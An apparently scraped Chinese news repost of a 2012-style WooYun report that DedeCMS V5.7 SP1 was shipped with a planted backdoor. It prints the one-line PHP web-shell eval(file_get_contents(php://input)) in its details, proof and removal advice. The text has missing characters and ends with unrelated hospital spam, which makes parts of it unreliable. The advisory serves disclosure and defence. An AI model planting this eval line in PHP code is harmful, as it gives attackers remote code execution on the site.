游泳

Dedecms疑似被植入後门仩传PHP後

2019-10-20 03:00:13来源:励志吧0次阅读

Admin5站长2月21日消息,昨日乌云漏洞报告平台(发布漏洞报告,称国内知名开源CMS软件D/include/p中,希望直接使用dedecms又未作审计的站速度处理。360站安全检测官方微博称经过工程师的测试,可以上传PHP后门来控制整个站

。目前已经将该后门加入到webscan站安全扫描平台扫描库中,希望各站及时进行扫描确认。

织梦内容管理系统(DedeCms)早期由IT柏拉图个人开发

, 以简单、实用、开源闻名,受到广大个人站长的青睐

。DedeCms站长用户众多,目前其官方还未对漏洞做出回应。希望广大使用Dedecms的站长能及时对站进行安全检测,做好漏洞防范,等待官方给出解决办法。

漏洞概要

缺陷编号: WooYun-

漏洞标题: Dedecms疑似被植入后门

相关厂商: Dedecms

漏洞作者: jsbug

提交时间:

公开时间:

漏洞类型: 成功的入侵事件

危害等级: 高

自评Rank: 10

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:

分享漏洞: 腾讯微博 新浪微博 Twitter 易微博 豆瓣

漏洞详情

披露状态:

: 积极联系厂商并且等待厂商认领中,细节不对外公开

: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

DedeCMS V5.7 SP1正式版

UTF-8 GBK版本疑似被植入一句话后门

前几日下载并不存在此代码

详细说明:

p被植入一句话@eval(file_get_contents(php://input));

漏洞证明:

p被植入一句话@eval(file_get_contents(php://input));

修复方案:

删除@eval(file_get_contents(php://input));


安顺哪里治癫痫病好
贵州癫痫防治中心
贵州癫痫医院排名
六盘水有哪些癫痫专业医院
南阳哪家男科医院治疗前列腺囊肿好
分享到: